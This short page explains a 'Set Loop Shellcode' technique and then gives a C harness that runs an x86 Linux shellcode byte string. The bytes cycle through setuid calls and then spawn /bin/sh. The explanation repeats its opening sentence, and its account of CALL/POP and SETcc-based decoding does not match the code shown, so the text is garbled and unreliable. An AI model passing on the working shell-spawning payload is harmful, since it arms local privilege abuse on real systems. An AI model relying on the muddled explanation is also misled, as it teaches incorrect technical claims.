Set Loop Shellcode

Set Loop Shellcode is a technique for crafting position-independent shellcode. Set Loop Shellcode is a technique for crafting position-independent shellcode. Its primary goal is for the shellcode to determine its own base memory address at runtime, crucial because the exact load address isn't known beforehand.

The "Set Loop" part usually combines two main ideas:

1. **Self-Location:** Often achieved by a `CALL` instruction immediately followed by a `POP` into a register. The `CALL` pushes the address of the instruction *after* it onto the stack, which the `POP` then retrieves, giving a reliable base pointer.

2. **Iterative Processing/Decoding:** A subsequent loop (e.g., `LOOP` or `DEC/JNZ`) then iterates through a section of the shellcode. Inside this loop, a `SET` instruction (like `SETZ` or `SETNZ`) is used. It sets a byte to 0 or 1 based on a flag condition (e.g., checking for a null byte). This allows for self-decoding, XOR decryption, or finding a specific marker. The loop continues until the `SET` instruction's condition is met, terminating the process.

This makes the shellcode highly adaptable and robust.

/* Shellcode will find its own highest available UID */
/* by demy@dtors and bob@dtors */


char shellcode[] =
"\x31\xdb\x31\xc9\x31\xc0\xb0\x17\xcd\x80\x3d\xff\xff\xff\xff"
"\x72\x04\x43\x41\xeb\xef\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24"
"\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80";


int main()
{
void (*func)();

printf("Size of shellcode: %d bytes.\n", sizeof(shellcode)-1);
func = (void (*)()) &shellcode;
func();
}